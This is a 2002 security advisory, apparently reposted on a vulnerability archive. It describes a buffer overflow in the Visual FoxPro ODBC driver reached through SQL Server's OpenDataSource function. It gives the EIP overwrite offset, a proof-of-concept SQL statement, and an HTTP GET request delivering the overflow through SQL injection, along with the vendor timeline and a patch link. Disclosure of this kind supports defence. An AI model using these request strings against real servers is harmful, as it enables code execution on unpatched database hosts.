what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

foxpro.overflow.txt

foxpro.overflow.txt
Posted Oct 4, 2002
Authored by sk | Site scan-associates.net

Scan Associates Security Advisory - Microsoft SQL Server 7.0 and 2000 with all service packs contains an exploitable buffer overflow in the OpenDataSource function when connecting to a "Microsoft Visual FoxPro Driver". Fix available here.

tags | overflow
SHA-256 | 26e594e72485ff41b1bc279d93df4f59a5b54c044de21868a546dfab542a2cbc

foxpro.overflow.txt

Change Mirror Download
Products: Microsoft SQL Server 7.0 and 2000, all Service Packs
Date: 6th August 2002
Summary: FoxPro ODBC Driver Buffer Overflow via SQL OpenDataSource()
Author: sk@scan-associates.net
Contributors: pokleyzz <pokleyzz@scan-associates.net>,
shaharil@scan-associates.net

Description
We found an exploitable buffer overflow using OpenDataSource function in
Microsoft SQL Server when we are connecting to "Microsoft Visual FoxPro
Driver". We have successfully exploited this vulnerability in the last =
Capture the Flag event in Malaysia and won the competition for the =
second time.

Details
Using a very long SourceDB, we can overwrite EIP register with any =
value.
The EIP will be overwritten at 276 bytes from SourceDB.

SELECT * FROM OpenDataSource( 'MSDASQL','Driver=3DMicrosoft Visual =
FoxPro
Driver;SourceDB=3De:\AAA...269...AAA<EIP>;SourceType=3DDBC')...xactions;

The following statement will cause EIP point to 0x42424242 which will =
cause
Access Voilation.

SELECT *
FROM OpenDataSource( 'MSDASQL','Driver=3DMicrosoft Visual FoxPro
Driver;SourceDB=3De:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB;SourceTy=
pe=3D
DBC')...xactions

If you are executing the statement via Query Analyzer, you will recieve
"EXCEPTION_ACCESS_VIOLATION" error. You may start WinDbg to attach SQL =
Server process first, before executing the statement to verify that EIP =
was overwritten with 0x42424242 (BBBB).

Using a small payload of about 190 bytes, we can upload any file into =
the server to be executed with previllege of the SQL Server (usually =
SYSTEM). It is also relatively easy to attack via SQL injection. So, =
even a Database behind a NAT can reverse telnet to us:

GET
/id.asp?id=3D'a';SELECT%20*%20FROM%20OpenDataSource(%20'MSDASQL','Driver%=
3dMic
rosoft%20Visual%20FoxPro%20Driver;SourceDB%3de:\AAAAAAAAAAAAAAAAAAAAAAAAA=
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAA
AAAAAAAAAAAAABBBB;SourceType%3dDBC')...xactions HTTP/1.0


The problem lies in FoxPro ODBC driver, so, any products that allow =
access to ODBC driver are vulnerable as well.


Solution

http://www.microsoft.com/technet/treeview/?url=3D/technet/security/bullet=
in/MS02-056.asp

Vendor Response
6th July 2002 : Alerted Microsoft.
13th July 2002 : Microsoft confirmed problem in FoxPro driver and will
release a patch.
25th September 2002 : Microsoft will release a bulletin
4th October 2002: Patch available to public

Discovery: pokleyzz@scan-associates.net
Exploit: sk@scan-associates.net

Links
=3D=3D=3D=3D=3D
1. Win32 Buffer Overflow Walkthrough -
http://www.scan-associates.net/papers/win32_bo_walkthrough.txt

2. SQL Injection Walkthrough -

http://www.scan-associates.net/papers/sql_injection_walkthrough.txt

Greetz to: =3Dda scan clan=3D , wyse, spoonfork, wanvadder, Alphaque, =
L33tdawg, Mnemonix, Mark Litchfield, b0iler@#vuln, Saumil Shah, =
nullbyte, syscalls, mycert team, and everyone else who know us.

Regards,

sk
Scan Associates Sdn Bhd, Malaysia
www.scan-associates.net

Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    16 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close